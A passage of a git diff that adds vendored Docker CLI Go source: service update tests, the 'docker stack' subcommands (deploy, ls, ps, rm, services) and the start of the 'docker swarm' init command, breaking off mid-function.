updateHealthcheck(flags, cspec) + if c.err != "" { + assert.Error(t, err, c.err) + } else { + assert.NilError(t, err) + if !reflect.DeepEqual(cspec.Healthcheck, c.expected) { + t.Errorf("incorrect result for test %d, expected health config:\n\t%#v\ngot:\n\t%#v", i, c.expected, cspec.Healthcheck) + } + } 
+ } +} + +func TestUpdateHosts(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("host-add", "example.net:2.2.2.2") + flags.Set("host-add", "ipv6.net:2001:db8:abc8::1") + // remove with ipv6 should work + flags.Set("host-rm", "example.net:2001:db8:abc8::1") + // just hostname should work as well + flags.Set("host-rm", "example.net") + // bad format error + assert.Error(t, flags.Set("host-add", "$example.com$"), "bad format for add-host:") + + hosts := []string{"1.2.3.4 example.com", "4.3.2.1 example.org", "2001:db8:abc8::1 example.net"} + + updateHosts(flags, &hosts) + assert.Equal(t, len(hosts), 3) + assert.Equal(t, hosts[0], "1.2.3.4 example.com") + assert.Equal(t, hosts[1], "2001:db8:abc8::1 ipv6.net") + assert.Equal(t, hosts[2], "4.3.2.1 example.org") +} + +func TestUpdatePortsRmWithProtocol(t *testing.T) { + flags := newUpdateCommand(nil).Flags() + flags.Set("publish-add", "8081:81") + flags.Set("publish-add", "8082:82") + flags.Set("publish-rm", "80") + flags.Set("publish-rm", "81/tcp") + flags.Set("publish-rm", "82/udp") + + portConfigs := []swarm.PortConfig{ + { + TargetPort: 80, + PublishedPort: 8080, + Protocol: swarm.PortConfigProtocolTCP, + PublishMode: swarm.PortConfigPublishModeIngress, + }, + } + + err := updatePorts(flags, &portConfigs) + assert.Equal(t, err, nil) + assert.Equal(t, len(portConfigs), 2) + assert.Equal(t, portConfigs[0].TargetPort, uint32(81)) + assert.Equal(t, portConfigs[1].TargetPort, uint32(82)) +} + +// FIXME(vdemeester) port to opts.PortOpt +func TestValidatePort(t *testing.T) { + validPorts := []string{"80/tcp", "80", "80/udp"} + invalidPorts := map[string]string{ + "9999999": "out of range", + "80:80/tcp": "invalid port format", + "53:53/udp": "invalid port format", + "80:80": "invalid port format", + "80/xyz": "invalid protocol", + "tcp": "invalid syntax", + "udp": "invalid syntax", + "": "invalid protocol", + } + for _, port := range validPorts { + _, err := validatePublishRemove(port) + assert.Equal(t, 
err, nil) + } + for port, e := range invalidPorts { + _, err := validatePublishRemove(port) + assert.Error(t, err, e) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/cmd.go b/vendor/github.com/docker/docker/cli/command/stack/cmd.go new file mode 100644 index 0000000000..860bfedd1a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/cmd.go @@ -0,0 +1,35 @@ +package stack + +import ( + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +// NewStackCommand returns a cobra command for `stack` subcommands +func NewStackCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "stack", + Short: "Manage Docker stacks", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + Tags: map[string]string{"version": "1.25"}, + } + cmd.AddCommand( + newDeployCommand(dockerCli), + newListCommand(dockerCli), + newRemoveCommand(dockerCli), + newServicesCommand(dockerCli), + newPsCommand(dockerCli), + ) + return cmd +} + +// NewTopLevelDeployCommand returns a command for `docker deploy` +func NewTopLevelDeployCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := newDeployCommand(dockerCli) + // Remove the aliases at the top level + cmd.Aliases = []string{} + cmd.Tags = map[string]string{"experimental": "", "version": "1.25"} + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/common.go b/vendor/github.com/docker/docker/cli/command/stack/common.go new file mode 100644 index 0000000000..72719f94fc --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/common.go @@ -0,0 +1,60 @@ +package stack + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" +) + +func getStackFilter(namespace 
string) filters.Args { + filter := filters.NewArgs() + filter.Add("label", convert.LabelNamespace+"="+namespace) + return filter +} + +func getStackFilterFromOpt(namespace string, opt opts.FilterOpt) filters.Args { + filter := opt.Value() + filter.Add("label", convert.LabelNamespace+"="+namespace) + return filter +} + +func getAllStacksFilter() filters.Args { + filter := filters.NewArgs() + filter.Add("label", convert.LabelNamespace) + return filter +} + +func getServices( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]swarm.Service, error) { + return apiclient.ServiceList( + ctx, + types.ServiceListOptions{Filters: getStackFilter(namespace)}) +} + +func getStackNetworks( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]types.NetworkResource, error) { + return apiclient.NetworkList( + ctx, + types.NetworkListOptions{Filters: getStackFilter(namespace)}) +} + +func getStackSecrets( + ctx context.Context, + apiclient client.APIClient, + namespace string, +) ([]swarm.Secret, error) { + return apiclient.SecretList( + ctx, + types.SecretListOptions{Filters: getStackFilter(namespace)}) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy.go b/vendor/github.com/docker/docker/cli/command/stack/deploy.go new file mode 100644 index 0000000000..980876a6a1 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/deploy.go @@ -0,0 +1,357 @@ +package stack + +import ( + "fmt" + "io/ioutil" + "os" + "sort" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + secretcli "github.com/docker/docker/cli/command/secret" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/cli/compose/loader" + composetypes "github.com/docker/docker/cli/compose/types" + dockerclient "github.com/docker/docker/client" + "github.com/pkg/errors" + "github.com/spf13/cobra" + 
"golang.org/x/net/context" +) + +const ( + defaultNetworkDriver = "overlay" +) + +type deployOptions struct { + bundlefile string + composefile string + namespace string + sendRegistryAuth bool +} + +func newDeployCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts deployOptions + + cmd := &cobra.Command{ + Use: "deploy [OPTIONS] STACK", + Aliases: []string{"up"}, + Short: "Deploy a new stack or update an existing stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runDeploy(dockerCli, opts) + }, + } + + flags := cmd.Flags() + addBundlefileFlag(&opts.bundlefile, flags) + addComposefileFlag(&opts.composefile, flags) + addRegistryAuthFlag(&opts.sendRegistryAuth, flags) + return cmd +} + +func runDeploy(dockerCli *command.DockerCli, opts deployOptions) error { + ctx := context.Background() + + switch { + case opts.bundlefile == "" && opts.composefile == "": + return fmt.Errorf("Please specify either a bundle file (with --bundle-file) or a Compose file (with --compose-file).") + case opts.bundlefile != "" && opts.composefile != "": + return fmt.Errorf("You cannot specify both a bundle file and a Compose file.") + case opts.bundlefile != "": + return deployBundle(ctx, dockerCli, opts) + default: + return deployCompose(ctx, dockerCli, opts) + } +} + +// checkDaemonIsSwarmManager does an Info API call to verify that the daemon is +// a swarm manager. This is necessary because we must create networks before we +// create services, but the API call for creating a network does not return a +// proper status code when it can't create a network in the "global" scope. +func checkDaemonIsSwarmManager(ctx context.Context, dockerCli *command.DockerCli) error { + info, err := dockerCli.Client().Info(ctx) + if err != nil { + return err + } + if !info.Swarm.ControlAvailable { + return errors.New("This node is not a swarm manager. 
Use \"docker swarm init\" or \"docker swarm join\" to connect this node to swarm and try again.") + } + return nil +} + +func deployCompose(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { + configDetails, err := getConfigDetails(opts) + if err != nil { + return err + } + + config, err := loader.Load(configDetails) + if err != nil { + if fpe, ok := err.(*loader.ForbiddenPropertiesError); ok { + return fmt.Errorf("Compose file contains unsupported options:\n\n%s\n", + propertyWarnings(fpe.Properties)) + } + + return err + } + + unsupportedProperties := loader.GetUnsupportedProperties(configDetails) + if len(unsupportedProperties) > 0 { + fmt.Fprintf(dockerCli.Err(), "Ignoring unsupported options: %s\n\n", + strings.Join(unsupportedProperties, ", ")) + } + + deprecatedProperties := loader.GetDeprecatedProperties(configDetails) + if len(deprecatedProperties) > 0 { + fmt.Fprintf(dockerCli.Err(), "Ignoring deprecated options:\n\n%s\n\n", + propertyWarnings(deprecatedProperties)) + } + + if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { + return err + } + + namespace := convert.NewNamespace(opts.namespace) + + serviceNetworks := getServicesDeclaredNetworks(config.Services) + networks, externalNetworks := convert.Networks(namespace, config.Networks, serviceNetworks) + if err := validateExternalNetworks(ctx, dockerCli, externalNetworks); err != nil { + return err + } + if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { + return err + } + + secrets, err := convert.Secrets(namespace, config.Secrets) + if err != nil { + return err + } + if err := createSecrets(ctx, dockerCli, namespace, secrets); err != nil { + return err + } + + services, err := convert.Services(namespace, config, dockerCli.Client()) + if err != nil { + return err + } + return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) +} +func getServicesDeclaredNetworks(serviceConfigs []composetypes.ServiceConfig) 
map[string]struct{} { + serviceNetworks := map[string]struct{}{} + for _, serviceConfig := range serviceConfigs { + if len(serviceConfig.Networks) == 0 { + serviceNetworks["default"] = struct{}{} + continue + } + for network := range serviceConfig.Networks { + serviceNetworks[network] = struct{}{} + } + } + return serviceNetworks +} + +func propertyWarnings(properties map[string]string) string { + var msgs []string + for name, description := range properties { + msgs = append(msgs, fmt.Sprintf("%s: %s", name, description)) + } + sort.Strings(msgs) + return strings.Join(msgs, "\n\n") +} + +func getConfigDetails(opts deployOptions) (composetypes.ConfigDetails, error) { + var details composetypes.ConfigDetails + var err error + + details.WorkingDir, err = os.Getwd() + if err != nil { + return details, err + } + + configFile, err := getConfigFile(opts.composefile) + if err != nil { + return details, err + } + // TODO: support multiple files + details.ConfigFiles = []composetypes.ConfigFile{*configFile} + return details, nil +} + +func getConfigFile(filename string) (*composetypes.ConfigFile, error) { + bytes, err := ioutil.ReadFile(filename) + if err != nil { + return nil, err + } + config, err := loader.ParseYAML(bytes) + if err != nil { + return nil, err + } + return &composetypes.ConfigFile{ + Filename: filename, + Config: config, + }, nil +} + +func validateExternalNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + externalNetworks []string) error { + client := dockerCli.Client() + + for _, networkName := range externalNetworks { + network, err := client.NetworkInspect(ctx, networkName) + if err != nil { + if dockerclient.IsErrNetworkNotFound(err) { + return fmt.Errorf("network %q is declared as external, but could not be found. 
You need to create the network before the stack is deployed (with overlay driver)", networkName) + } + return err + } + if network.Scope != "swarm" { + return fmt.Errorf("network %q is declared as external, but it is not in the right scope: %q instead of %q", networkName, network.Scope, "swarm") + } + } + + return nil +} + +func createSecrets( + ctx context.Context, + dockerCli *command.DockerCli, + namespace convert.Namespace, + secrets []swarm.SecretSpec, +) error { + client := dockerCli.Client() + + for _, secretSpec := range secrets { + // TODO: fix this after https://github.com/docker/docker/pull/29218 + secrets, err := secretcli.GetSecretsByNameOrIDPrefixes(ctx, client, []string{secretSpec.Name}) + switch { + case err != nil: + return err + case len(secrets) > 1: + return errors.Errorf("ambiguous secret name: %s", secretSpec.Name) + case len(secrets) == 0: + fmt.Fprintf(dockerCli.Out(), "Creating secret %s\n", secretSpec.Name) + _, err = client.SecretCreate(ctx, secretSpec) + default: + secret := secrets[0] + // Update secret to ensure that the local data hasn't changed + err = client.SecretUpdate(ctx, secret.ID, secret.Meta.Version, secretSpec) + } + if err != nil { + return err + } + } + return nil +} + +func createNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + namespace convert.Namespace, + networks map[string]types.NetworkCreate, +) error { + client := dockerCli.Client() + + existingNetworks, err := getStackNetworks(ctx, client, namespace.Name()) + if err != nil { + return err + } + + existingNetworkMap := make(map[string]types.NetworkResource) + for _, network := range existingNetworks { + existingNetworkMap[network.Name] = network + } + + for internalName, createOpts := range networks { + name := namespace.Scope(internalName) + if _, exists := existingNetworkMap[name]; exists { + continue + } + + if createOpts.Driver == "" { + createOpts.Driver = defaultNetworkDriver + } + + fmt.Fprintf(dockerCli.Out(), "Creating network %s\n", name) 
+ if _, err := client.NetworkCreate(ctx, name, createOpts); err != nil { + return err + } + } + + return nil +} + +func deployServices( + ctx context.Context, + dockerCli *command.DockerCli, + services map[string]swarm.ServiceSpec, + namespace convert.Namespace, + sendAuth bool, +) error { + apiClient := dockerCli.Client() + out := dockerCli.Out() + + existingServices, err := getServices(ctx, apiClient, namespace.Name()) + if err != nil { + return err + } + + existingServiceMap := make(map[string]swarm.Service) + for _, service := range existingServices { + existingServiceMap[service.Spec.Name] = service + } + + for internalName, serviceSpec := range services { + name := namespace.Scope(internalName) + + encodedAuth := "" + if sendAuth { + // Retrieve encoded auth token from the image reference + image := serviceSpec.TaskTemplate.ContainerSpec.Image + encodedAuth, err = command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) + if err != nil { + return err + } + } + + if service, exists := existingServiceMap[name]; exists { + fmt.Fprintf(out, "Updating service %s (id: %s)\n", name, service.ID) + + updateOpts := types.ServiceUpdateOptions{} + if sendAuth { + updateOpts.EncodedRegistryAuth = encodedAuth + } + response, err := apiClient.ServiceUpdate( + ctx, + service.ID, + service.Version, + serviceSpec, + updateOpts, + ) + if err != nil { + return err + } + + for _, warning := range response.Warnings { + fmt.Fprintln(dockerCli.Err(), warning) + } + } else { + fmt.Fprintf(out, "Creating service %s\n", name) + + createOpts := types.ServiceCreateOptions{} + if sendAuth { + createOpts.EncodedRegistryAuth = encodedAuth + } + if _, err := apiClient.ServiceCreate(ctx, serviceSpec, createOpts); err != nil { + return err + } + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go new file mode 100644 index 0000000000..5a178c4ab6 --- /dev/null +++ 
b/vendor/github.com/docker/docker/cli/command/stack/deploy_bundlefile.go @@ -0,0 +1,83 @@ +package stack + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/compose/convert" +) + +func deployBundle(ctx context.Context, dockerCli *command.DockerCli, opts deployOptions) error { + bundle, err := loadBundlefile(dockerCli.Err(), opts.namespace, opts.bundlefile) + if err != nil { + return err + } + + if err := checkDaemonIsSwarmManager(ctx, dockerCli); err != nil { + return err + } + + namespace := convert.NewNamespace(opts.namespace) + + networks := make(map[string]types.NetworkCreate) + for _, service := range bundle.Services { + for _, networkName := range service.Networks { + networks[networkName] = types.NetworkCreate{ + Labels: convert.AddStackLabel(namespace, nil), + } + } + } + + services := make(map[string]swarm.ServiceSpec) + for internalName, service := range bundle.Services { + name := namespace.Scope(internalName) + + var ports []swarm.PortConfig + for _, portSpec := range service.Ports { + ports = append(ports, swarm.PortConfig{ + Protocol: swarm.PortConfigProtocol(portSpec.Protocol), + TargetPort: portSpec.Port, + }) + } + + nets := []swarm.NetworkAttachmentConfig{} + for _, networkName := range service.Networks { + nets = append(nets, swarm.NetworkAttachmentConfig{ + Target: namespace.Scope(networkName), + Aliases: []string{networkName}, + }) + } + + serviceSpec := swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: name, + Labels: convert.AddStackLabel(namespace, service.Labels), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: service.Image, + Command: service.Command, + Args: service.Args, + Env: service.Env, + // Service Labels will not be copied to Containers + // automatically during the deployment so we apply + // it here. 
+ Labels: convert.AddStackLabel(namespace, nil), + }, + }, + EndpointSpec: &swarm.EndpointSpec{ + Ports: ports, + }, + Networks: nets, + } + + services[internalName] = serviceSpec + } + + if err := createNetworks(ctx, dockerCli, namespace, networks); err != nil { + return err + } + return deployServices(ctx, dockerCli, services, namespace, opts.sendRegistryAuth) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/list.go b/vendor/github.com/docker/docker/cli/command/stack/list.go new file mode 100644 index 0000000000..9b6c645e29 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/list.go @@ -0,0 +1,113 @@ +package stack + +import ( + "fmt" + "io" + "strconv" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/compose/convert" + "github.com/docker/docker/client" + "github.com/spf13/cobra" +) + +const ( + listItemFmt = "%s\t%s\n" +) + +type listOptions struct { +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{} + + cmd := &cobra.Command{ + Use: "ls", + Aliases: []string{"list"}, + Short: "List stacks", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + stacks, err := getStacks(ctx, client) + if err != nil { + return err + } + + out := dockerCli.Out() + printTable(out, stacks) + return nil +} + +func printTable(out io.Writer, stacks []*stack) { + writer := tabwriter.NewWriter(out, 0, 4, 2, ' ', 0) + + // Ignore flushing errors + defer writer.Flush() + + fmt.Fprintf(writer, listItemFmt, "NAME", "SERVICES") + for _, stack := range stacks { + fmt.Fprintf( + writer, + listItemFmt, + stack.Name, + strconv.Itoa(stack.Services), + ) + } 
+} + +type stack struct { + // Name is the name of the stack + Name string + // Services is the number of the services + Services int +} + +func getStacks( + ctx context.Context, + apiclient client.APIClient, +) ([]*stack, error) { + services, err := apiclient.ServiceList( + ctx, + types.ServiceListOptions{Filters: getAllStacksFilter()}) + if err != nil { + return nil, err + } + m := make(map[string]*stack, 0) + for _, service := range services { + labels := service.Spec.Labels + name, ok := labels[convert.LabelNamespace] + if !ok { + return nil, fmt.Errorf("cannot get label %s for service %s", + convert.LabelNamespace, service.ID) + } + ztack, ok := m[name] + if !ok { + m[name] = &stack{ + Name: name, + Services: 1, + } + } else { + ztack.Services++ + } + } + var stacks []*stack + for _, stack := range m { + stacks = append(stacks, stack) + } + return stacks, nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/opts.go b/vendor/github.com/docker/docker/cli/command/stack/opts.go new file mode 100644 index 0000000000..74fe4f5343 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/opts.go @@ -0,0 +1,49 @@ +package stack + +import ( + "fmt" + "io" + "os" + + "github.com/docker/docker/cli/command/bundlefile" + "github.com/spf13/pflag" +) + +func addComposefileFlag(opt *string, flags *pflag.FlagSet) { + flags.StringVarP(opt, "compose-file", "c", "", "Path to a Compose file") +} + +func addBundlefileFlag(opt *string, flags *pflag.FlagSet) { + flags.StringVar(opt, "bundle-file", "", "Path to a Distributed Application Bundle file") + flags.SetAnnotation("bundle-file", "experimental", nil) +} + +func addRegistryAuthFlag(opt *bool, flags *pflag.FlagSet) { + flags.BoolVar(opt, "with-registry-auth", false, "Send registry authentication details to Swarm agents") +} + +func loadBundlefile(stderr io.Writer, namespace string, path string) (*bundlefile.Bundlefile, error) { + defaultPath := fmt.Sprintf("%s.dab", namespace) + + if path == "" { + 
path = defaultPath + } + if _, err := os.Stat(path); err != nil { + return nil, fmt.Errorf( + "Bundle %s not found. Specify the path with --file", + path) + } + + fmt.Fprintf(stderr, "Loading bundle from %s\n", path) + reader, err := os.Open(path) + if err != nil { + return nil, err + } + defer reader.Close() + + bundle, err := bundlefile.LoadFile(reader) + if err != nil { + return nil, fmt.Errorf("Error reading %s: %v\n", path, err) + } + return bundle, err +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/ps.go b/vendor/github.com/docker/docker/cli/command/stack/ps.go new file mode 100644 index 0000000000..e4351bfc7c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/ps.go @@ -0,0 +1,61 @@ +package stack + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/idresolver" + "github.com/docker/docker/cli/command/task" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type psOptions struct { + filter opts.FilterOpt + noTrunc bool + namespace string + noResolve bool +} + +func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := psOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ps [OPTIONS] STACK", + Short: "List the tasks in the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runPS(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") + flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runPS(dockerCli *command.DockerCli, opts psOptions) error { + namespace := opts.namespace + client := dockerCli.Client() + ctx := context.Background() + + 
filter := getStackFilterFromOpt(opts.namespace, opts.filter) + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) + if err != nil { + return err + } + + if len(tasks) == 0 { + fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) + return nil + } + + return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/remove.go b/vendor/github.com/docker/docker/cli/command/stack/remove.go new file mode 100644 index 0000000000..966c1aa6bf --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/remove.go @@ -0,0 +1,112 @@ +package stack + +import ( + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" + "golang.org/x/net/context" +) + +type removeOptions struct { + namespace string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm STACK", + Aliases: []string{"remove", "down"}, + Short: "Remove the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runRemove(dockerCli, opts) + }, + } + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts removeOptions) error { + namespace := opts.namespace + client := dockerCli.Client() + ctx := context.Background() + + services, err := getServices(ctx, client, namespace) + if err != nil { + return err + } + + networks, err := getStackNetworks(ctx, client, namespace) + if err != nil { + return err + } + + secrets, err := getStackSecrets(ctx, client, namespace) + if err != nil { + return err + } + + if len(services)+len(networks)+len(secrets) == 0 { + fmt.Fprintf(dockerCli.Out(), "Nothing found in stack: %s\n", namespace) + return nil + } + + hasError := removeServices(ctx, 
dockerCli, services) + hasError = removeSecrets(ctx, dockerCli, secrets) || hasError + hasError = removeNetworks(ctx, dockerCli, networks) || hasError + + if hasError { + return fmt.Errorf("Failed to remove some resources") + } + return nil +} + +func removeServices( + ctx context.Context, + dockerCli *command.DockerCli, + services []swarm.Service, +) bool { + var err error + for _, service := range services { + fmt.Fprintf(dockerCli.Err(), "Removing service %s\n", service.Spec.Name) + if err = dockerCli.Client().ServiceRemove(ctx, service.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove service %s: %s", service.ID, err) + } + } + return err != nil +} + +func removeNetworks( + ctx context.Context, + dockerCli *command.DockerCli, + networks []types.NetworkResource, +) bool { + var err error + for _, network := range networks { + fmt.Fprintf(dockerCli.Err(), "Removing network %s\n", network.Name) + if err = dockerCli.Client().NetworkRemove(ctx, network.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove network %s: %s", network.ID, err) + } + } + return err != nil +} + +func removeSecrets( + ctx context.Context, + dockerCli *command.DockerCli, + secrets []swarm.Secret, +) bool { + var err error + for _, secret := range secrets { + fmt.Fprintf(dockerCli.Err(), "Removing secret %s\n", secret.Spec.Name) + if err = dockerCli.Client().SecretRemove(ctx, secret.ID); err != nil { + fmt.Fprintf(dockerCli.Err(), "Failed to remove secret %s: %s", secret.ID, err) + } + } + return err != nil +} diff --git a/vendor/github.com/docker/docker/cli/command/stack/services.go b/vendor/github.com/docker/docker/cli/command/stack/services.go new file mode 100644 index 0000000000..a46652df7c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/stack/services.go @@ -0,0 +1,79 @@ +package stack + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + 
"github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/service" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type servicesOptions struct { + quiet bool + filter opts.FilterOpt + namespace string +} + +func newServicesCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := servicesOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "services [OPTIONS] STACK", + Short: "List the services in the stack", + Args: cli.ExactArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.namespace = args[0] + return runServices(dockerCli, opts) + }, + } + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display IDs") + flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") + + return cmd +} + +func runServices(dockerCli *command.DockerCli, opts servicesOptions) error { + ctx := context.Background() + client := dockerCli.Client() + + filter := getStackFilterFromOpt(opts.namespace, opts.filter) + services, err := client.ServiceList(ctx, types.ServiceListOptions{Filters: filter}) + if err != nil { + return err + } + + out := dockerCli.Out() + + // if no services in this stack, print message and exit 0 + if len(services) == 0 { + fmt.Fprintf(out, "Nothing found in stack: %s\n", opts.namespace) + return nil + } + + if opts.quiet { + service.PrintQuiet(out, services) + } else { + taskFilter := filters.NewArgs() + for _, service := range services { + taskFilter.Add("service", service.ID) + } + + tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: taskFilter}) + if err != nil { + return err + } + nodes, err := client.NodeList(ctx, types.NodeListOptions{}) + if err != nil { + return err + } + service.PrintNotQuiet(out, services, nodes, tasks) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/cmd.go b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go new 
file mode 100644 index 0000000000..632679c4b6 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/cmd.go @@ -0,0 +1,28 @@ +package swarm + +import ( + "github.com/spf13/cobra" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" +) + +// NewSwarmCommand returns a cobra command for `swarm` subcommands +func NewSwarmCommand(dockerCli *command.DockerCli) *cobra.Command { + cmd := &cobra.Command{ + Use: "swarm", + Short: "Manage Swarm", + Args: cli.NoArgs, + RunE: dockerCli.ShowHelp, + } + cmd.AddCommand( + newInitCommand(dockerCli), + newJoinCommand(dockerCli), + newJoinTokenCommand(dockerCli), + newUnlockKeyCommand(dockerCli), + newUpdateCommand(dockerCli), + newLeaveCommand(dockerCli), + newUnlockCommand(dockerCli), + ) + return cmd +} diff --git a/vendor/github.com/docker/docker/cli/command/swarm/init.go b/vendor/github.com/docker/docker/cli/command/swarm/init.go new file mode 100644 index 0000000000..2550feeb47 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/swarm/init.go @@ -0,0 +1,85 @@ +package swarm + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/pkg/errors" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type initOptions struct { + swarmOptions + listenAddr NodeAddrOption + // Not a NodeAddrOption because it has no default port. 
+ advertiseAddr string + forceNewCluster bool +} + +func newInitCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := initOptions{ + listenAddr: NewListenAddrOption(), + } + + cmd := &cobra.Command{ + Use: "init [OPTIONS]", + Short: "Initialize a swarm", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runInit(dockerCli, cmd.Flags(), opts) + }, + } + + flags := cmd.Flags() + flags.Var(&opts.listenAddr, flagListenAddr, "Listen address (format: [:port])") + flags.StringVar(&opts.advertiseAddr, flagAdvertiseAddr, "", "Advertised address (format: [:port])") + flags.BoolVar(&opts.forceNewCluster, "force-new-cluster", false, "Force create a new cluster from current state") + flags.BoolVar(&opts.autolock, flagAutolock, false, "Enable manager autolocking (requiring an unlock key to start a stopped manager)") + addSwarmFlags(flags, &opts.swarmOptions) + return cmd +} + +func runInit(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts initOptions) error { + client := dockerCli.Client() + ctx := context.Background() + + req := swarm.InitRequest{ + ListenAddr: opts.listenAddr.String(), + AdvertiseAddr: opts.advertiseAddr, + ForceNewCluster: opts.forceNewCluster, + Spec: opts.swarmOptions.ToSpec(flags), + AutoLockManagers: opts.swarmOptions.autolock, + } + + nodeID, err := client.SwarmInit(ctx, req) + if err != nil { + if strings.Contains(err.Error(), "could not choose an IP address to advertise") || strings.Contains(err.Error(), "could not find the system's IP address") { + return errors.New(err.Error() + " - specify one with --advertise-addr") + } + return err + } + + fmt.Fprintf(dockerCli.Out(), "Swarm initialized: current node (%s) is now a manager.\n\n", nodeID) + + if err := printJoinCommand(ctx, dockerCli, nodeID, true, false); err != nil { + return err + } + + fmt.Fprint(dockerCli.Out(), "To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.\n\n") + + if req.AutoLockManagers 
